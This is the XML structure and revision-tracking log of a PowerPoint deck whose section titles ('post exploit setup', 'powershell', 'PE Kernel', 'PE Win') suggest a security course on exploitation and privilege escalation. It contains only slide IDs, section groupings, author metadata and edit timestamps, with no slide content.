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102"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId103"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="542" r:id="rId2"/>
    <p:sldId id="300" r:id="rId3"/>
    <p:sldId id="464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7" r:id="rId15"/>
    <p:sldId id="478" r:id="rId16"/>
    <p:sldId id="476" r:id="rId17"/>
    <p:sldId id="465" r:id="rId18"/>
    <p:sldId id="445" r:id="rId19"/>
    <p:sldId id="446" r:id="rId20"/>
    <p:sldId id="447" r:id="rId21"/>
    <p:sldId id="448" r:id="rId22"/>
    <p:sldId id="493" r:id="rId23"/>
    <p:sldId id="449" r:id="rId24"/>
    <p:sldId id="454" r:id="rId25"/>
    <p:sldId id="358" r:id="rId26"/>
    <p:sldId id="416" r:id="rId27"/>
    <p:sldId id="417" r:id="rId28"/>
    <p:sldId id="450" r:id="rId29"/>
    <p:sldId id="494" r:id="rId30"/>
    <p:sldId id="419" r:id="rId31"/>
    <p:sldId id="479" r:id="rId32"/>
    <p:sldId id="420" r:id="rId33"/>
    <p:sldId id="543" r:id="rId34"/>
    <p:sldId id="453" r:id="rId35"/>
    <p:sldId id="480" r:id="rId36"/>
    <p:sldId id="455" r:id="rId37"/>
    <p:sldId id="544" r:id="rId38"/>
    <p:sldId id="456" r:id="rId39"/>
    <p:sldId id="481" r:id="rId40"/>
    <p:sldId id="422" r:id="rId41"/>
    <p:sldId id="423" r:id="rId42"/>
    <p:sldId id="482" r:id="rId43"/>
    <p:sldId id="458" r:id="rId44"/>
    <p:sldId id="463" r:id="rId45"/>
    <p:sldId id="424" r:id="rId46"/>
    <p:sldId id="483" r:id="rId47"/>
    <p:sldId id="459" r:id="rId48"/>
    <p:sldId id="545" r:id="rId49"/>
    <p:sldId id="425" r:id="rId50"/>
    <p:sldId id="460" r:id="rId51"/>
    <p:sldId id="484" r:id="rId52"/>
    <p:sldId id="461" r:id="rId53"/>
    <p:sldId id="426" r:id="rId54"/>
    <p:sldId id="485" r:id="rId55"/>
    <p:sldId id="462" r:id="rId56"/>
    <p:sldId id="518" r:id="rId57"/>
    <p:sldId id="503" r:id="rId58"/>
    <p:sldId id="504" r:id="rId59"/>
    <p:sldId id="505" r:id="rId60"/>
    <p:sldId id="506" r:id="rId61"/>
    <p:sldId id="546" r:id="rId62"/>
    <p:sldId id="507" r:id="rId63"/>
    <p:sldId id="508" r:id="rId64"/>
    <p:sldId id="509" r:id="rId65"/>
    <p:sldId id="510" r:id="rId66"/>
    <p:sldId id="513" r:id="rId67"/>
    <p:sldId id="511" r:id="rId68"/>
    <p:sldId id="514" r:id="rId69"/>
    <p:sldId id="516" r:id="rId70"/>
    <p:sldId id="517" r:id="rId71"/>
    <p:sldId id="515" r:id="rId72"/>
    <p:sldId id="519" r:id="rId73"/>
    <p:sldId id="512" r:id="rId74"/>
    <p:sldId id="522" r:id="rId75"/>
    <p:sldId id="527" r:id="rId76"/>
    <p:sldId id="523" r:id="rId77"/>
    <p:sldId id="525" r:id="rId78"/>
    <p:sldId id="547" r:id="rId79"/>
    <p:sldId id="489" r:id="rId80"/>
    <p:sldId id="529" r:id="rId81"/>
    <p:sldId id="530" r:id="rId82"/>
    <p:sldId id="528" r:id="rId83"/>
    <p:sldId id="490" r:id="rId84"/>
    <p:sldId id="495" r:id="rId85"/>
    <p:sldId id="491" r:id="rId86"/>
    <p:sldId id="501" r:id="rId87"/>
    <p:sldId id="497" r:id="rId88"/>
    <p:sldId id="533" r:id="rId89"/>
    <p:sldId id="531" r:id="rId90"/>
    <p:sldId id="534" r:id="rId91"/>
    <p:sldId id="535" r:id="rId92"/>
    <p:sldId id="498" r:id="rId93"/>
    <p:sldId id="526" r:id="rId94"/>
    <p:sldId id="536" r:id="rId95"/>
    <p:sldId id="532" r:id="rId96"/>
    <p:sldId id="537" r:id="rId97"/>
    <p:sldId id="538" r:id="rId98"/>
    <p:sldId id="539" r:id="rId99"/>
    <p:sldId id="541" r:id="rId100"/>
    <p:sldId id="540" r:id="rId10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4F3FAE0A-0456-4958-8961-66D4DF204563}">
          <p14:sldIdLst>
            <p14:sldId id="542"/>
            <p14:sldId id="300"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="fixing an exploit" id="{A349092F-3815-4200-BF28-2025AB5C44FC}">
          <p14:sldIdLst>
            <p14:sldId id="464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7"/>
            <p14:sldId id="478"/>
            <p14:sldId id="476"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="post exploit setup" id="{D34EC971-4C10-421C-84A9-1E9EA12AF532}">
          <p14:sldIdLst>
            <p14:sldId id="465"/>
            <p14:sldId id="445"/>
            <p14:sldId id="446"/>
            <p14:sldId id="447"/>
            <p14:sldId id="448"/>
            <p14:sldId id="493"/>
            <p14:sldId id="449"/>
            <p14:sldId id="454"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="cmd" id="{D9E84F0B-C0EE-4FCF-8E9C-D827E1E3C87C}">
          <p14:sldIdLst>
            <p14:sldId id="358"/>
            <p14:sldId id="416"/>
            <p14:sldId id="417"/>
            <p14:sldId id="450"/>
            <p14:sldId id="494"/>
            <p14:sldId id="419"/>
            <p14:sldId id="479"/>
            <p14:sldId id="420"/>
            <p14:sldId id="543"/>
            <p14:sldId id="453"/>
            <p14:sldId id="480"/>
            <p14:sldId id="455"/>
            <p14:sldId id="544"/>
            <p14:sldId id="456"/>
            <p14:sldId id="481"/>
            <p14:sldId id="422"/>
            <p14:sldId id="423"/>
            <p14:sldId id="482"/>
            <p14:sldId id="458"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="powershell" id="{411889D0-736F-4BDC-BD85-BC4CAD91EA6A}">
          <p14:sldIdLst>
            <p14:sldId id="463"/>
            <p14:sldId id="424"/>
            <p14:sldId id="483"/>
            <p14:sldId id="459"/>
            <p14:sldId id="545"/>
            <p14:sldId id="425"/>
            <p14:sldId id="460"/>
            <p14:sldId id="484"/>
            <p14:sldId id="461"/>
            <p14:sldId id="426"/>
            <p14:sldId id="485"/>
            <p14:sldId id="462"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="PE Kernel" id="{00F45E6E-7706-45F7-99DA-B8FC3B50BF4D}">
          <p14:sldIdLst>
            <p14:sldId id="518"/>
            <p14:sldId id="503"/>
            <p14:sldId id="504"/>
            <p14:sldId id="505"/>
            <p14:sldId id="506"/>
            <p14:sldId id="546"/>
            <p14:sldId id="507"/>
            <p14:sldId id="508"/>
            <p14:sldId id="509"/>
            <p14:sldId id="510"/>
            <p14:sldId id="513"/>
            <p14:sldId id="511"/>
            <p14:sldId id="514"/>
            <p14:sldId id="516"/>
            <p14:sldId id="517"/>
            <p14:sldId id="515"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="PE Win" id="{994D8366-B1CC-4241-B953-2EF8E544662F}">
          <p14:sldIdLst>
            <p14:sldId id="519"/>
            <p14:sldId id="512"/>
            <p14:sldId id="522"/>
            <p14:sldId id="527"/>
            <p14:sldId id="523"/>
            <p14:sldId id="525"/>
            <p14:sldId id="547"/>
            <p14:sldId id="489"/>
            <p14:sldId id="529"/>
            <p14:sldId id="530"/>
            <p14:sldId id="528"/>
            <p14:sldId id="490"/>
            <p14:sldId id="495"/>
            <p14:sldId id="491"/>
            <p14:sldId id="501"/>
            <p14:sldId id="497"/>
            <p14:sldId id="533"/>
            <p14:sldId id="531"/>
            <p14:sldId id="534"/>
            <p14:sldId id="535"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="xc" id="{E5831570-C1D4-4E40-A4E4-DD13E7411B0D}">
          <p14:sldIdLst>
            <p14:sldId id="498"/>
            <p14:sldId id="526"/>
            <p14:sldId id="536"/>
            <p14:sldId id="532"/>
            <p14:sldId id="537"/>
            <p14:sldId id="538"/>
            <p14:sldId id="539"/>
            <p14:sldId id="541"/>
            <p14:sldId id="5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ting Fan" initials="YF" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::yf1398@nyu.edu::b1490508-5346-497b-a798-d124af15f9c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FF00"/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A72E1-AAA7-485E-9402-DC55A9770DBF}" v="8" dt="2021-04-19T00:41:18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/>
    <p:restoredTop sz="81825"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="134" d="100"/>
          <a:sy n="134" d="100"/>
        </p:scale>
        <p:origin x="79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Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd modSection">
      <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-05-09T02:38:13.068" v="1800"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:49:13.300" v="127" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3623423667" sldId="420"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:49:13.300" v="127" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3623423667" sldId="420"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T13:16:36.654" v="1730" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2833651099" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T13:16:36.654" v="1730" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2833651099" sldId="445"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:56:56.949" v="347" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2833651099" sldId="445"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:59:39.984" v="489" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1296286958" sldId="448"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:59:39.984" v="489" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1296286958" sldId="448"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:48:03.573" v="126" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1563660936" sldId="449"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:48:03.573" v="126" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1563660936" sldId="449"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:55:13.912" v="295" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2118958681" sldId="454"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:55:13.912" v="295" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2118958681" sldId="454"/>
            <ac:spMk id="2" creationId="{B8BFA2BD-5848-49DF-A9E7-16CEB95CC144}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:50:40.365" v="133" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="724427636" sldId="465"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:50:40.365" v="133" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="724427636" sldId="465"/>
            <ac:spMk id="15363" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:43:54.559" v="70" actId="166"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2446446024" sldId="468"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:43:54.559" v="70" actId="166"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:spMk id="2" creationId="{5014E8AC-F0BB-4CC0-9098-8CF958C02B94}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:43:05.913" v="60" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:spMk id="9" creationId="{E11220F5-8A31-4FCA-B3B6-7D2316FFF921}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:42:09.211" v="42" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:picMk id="5" creationId="{9AC023AE-2803-4E0F-963A-6F8550101FFB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:41:56.013" v="33" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:picMk id="6" creationId="{D72F8F42-7347-4AD2-B309-5C00756F6D0C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:43:04.316" v="59" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:picMk id="7" creationId="{1D7B442B-96D1-430D-931E-65E0D851FC59}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:42:25.202" v="49" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:picMk id="8" creationId="{CDFEEBF9-8F5A-4845-8928-C568EC90D231}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:43:45.409" v="69" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:cxnSpMk id="11" creationId="{11AE0C80-EE54-48DE-AA3E-80A8D59F494C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:43:38.861" v="68" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2446446024" sldId="468"/>
            <ac:cxnSpMk id="13" creationId="{60679810-0483-44D6-AB8F-AE5D9E455B2F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:44:24.919" v="73" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3122281520" sldId="470"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:44:24.919" v="73" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3122281520" sldId="470"/>
            <ac:spMk id="2" creationId="{D34119D2-0DFB-487C-ADA3-A903E927B667}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:44:35.750" v="81" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3092225512" sldId="471"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:44:35.750" v="81" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3092225512" sldId="471"/>
            <ac:spMk id="2" creationId="{EE185A8D-69A4-430D-8863-A6F4689804DF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:45:34.165" v="116" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2522059795" sldId="476"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T17:45:34.165" v="116" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2522059795" sldId="476"/>
            <ac:spMk id="2" creationId="{E9ED7280-C53E-43B4-8A7A-CD16D242A791}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:14:31.469" v="1197" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1951552256" sldId="491"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:14:31.469" v="1197" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1951552256" sldId="491"/>
            <ac:spMk id="2" creationId="{15D43C08-EC0C-429F-978B-03C8C1540206}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:14:04.948" v="1088" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1951552256" sldId="491"/>
            <ac:picMk id="5" creationId="{AA1E403C-CA76-4D32-A2FF-E82FACA5982F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-21T00:44:07.737" v="1796" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1345109982" sldId="495"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-21T00:44:07.737" v="1796" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1345109982" sldId="495"/>
            <ac:spMk id="3" creationId="{66D3F9AC-E742-4A07-8B16-C77430D20156}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:36:11.430" v="1263" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1345109982" sldId="495"/>
            <ac:picMk id="5" creationId="{C04C5376-A929-4AE3-B95B-D68BF218A8A1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T13:18:06.269" v="1791" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1345109982" sldId="495"/>
            <ac:picMk id="6" creationId="{557931C9-9E03-1E43-B428-04FB02E92F0B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:35:40.356" v="1228" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1345109982" sldId="495"/>
            <ac:picMk id="8" creationId="{81E28466-86E5-4EDA-B9C9-914F7CA94332}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:42:25.503" v="1364" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4019792942" sldId="497"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:42:25.503" v="1364" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4019792942" sldId="497"/>
            <ac:spMk id="2" creationId="{E65CB60C-5E50-40C4-AE99-736B19D0E17A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-05-09T02:38:13.068" v="1800"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="780172462" sldId="513"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:44:40.559" v="763" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2313803311" sldId="518"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:44:40.559" v="763" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2313803311" sldId="518"/>
            <ac:spMk id="15363" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:00:05.295" v="490" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="297700907" sldId="520"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:00:12.215" v="491" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1365002525" sldId="521"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
